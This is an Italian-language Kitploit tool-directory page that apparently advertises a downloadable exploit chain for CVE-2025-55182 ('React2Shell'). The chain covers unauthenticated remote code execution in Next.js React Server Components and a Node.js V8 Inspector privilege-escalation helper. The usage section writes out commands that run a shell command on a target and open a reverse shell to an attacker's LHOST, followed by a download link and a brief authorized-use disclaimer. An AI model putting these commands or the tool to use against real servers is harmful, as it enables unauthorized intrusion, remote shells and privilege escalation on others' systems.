Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Exploit autonomo per CVE-2025-55182 che consente RCE non autenticata in Next.js App Router tramite deserializzazione Flight di React Server Components, con reverse shell e helper per l'escalation dei privilegi tramite Node.js V8 Inspector. | Kitploit
Strumenti/GitHubGitHub/r3vpwnx/cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

Exploit autonomo per CVE-2025-55182 che consente RCE non autenticata in Next.js App Router tramite deserializzazione Flight di React Server Components, con reverse shell e helper per l'escalation dei privilegi tramite Node.js V8 Inspector.

Vedi Repository
22h 49m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - React2Shell (CVE-2025-55182) RCE non autenticata tramite deserializzazione Flight dei React Server Components

Exploit autonomo per CVE-2025-55182 nelle app Next.js App Router che abilitano i React Server Components. Payload RSC Flight appositamente costruiti inviati all'endpoint server-action consentono l'esecuzione remota di codice non autenticata. Include un helper per l'escalation dei privilegi locali Node.js V8 Inspector (debug-port) che esegue codice in un processo privilegiato tramite un bypass della sandbox process.mainModule.require.

CVE: CVE-2025-55182

Requisiti

root@kitploit:~
python3 -m pip install requests    # per i PoC Python

Utilizzo

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <target>

(RSC RCE — incluso, vedi Crediti)

react2shell-poc.py
root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # esfiltrazione comandi basata su errori
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

Riferimenti

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

Crediti

react2shell-poc.py è il PoC pubblico di p3ta00 per CVE-2025-55182, incluso senza modifiche da https://github.com/p3ta00/react2shell-poc per una catena autonoma. cdp_privesc.py (il privesc locale Node.js V8 Inspector) è originale.

Disclaimer

Solo per test di sicurezza autorizzati e scopi educativi. Eseguilo esclusivamente contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test.


Autore: r3vpwnx

Scarica lo strumento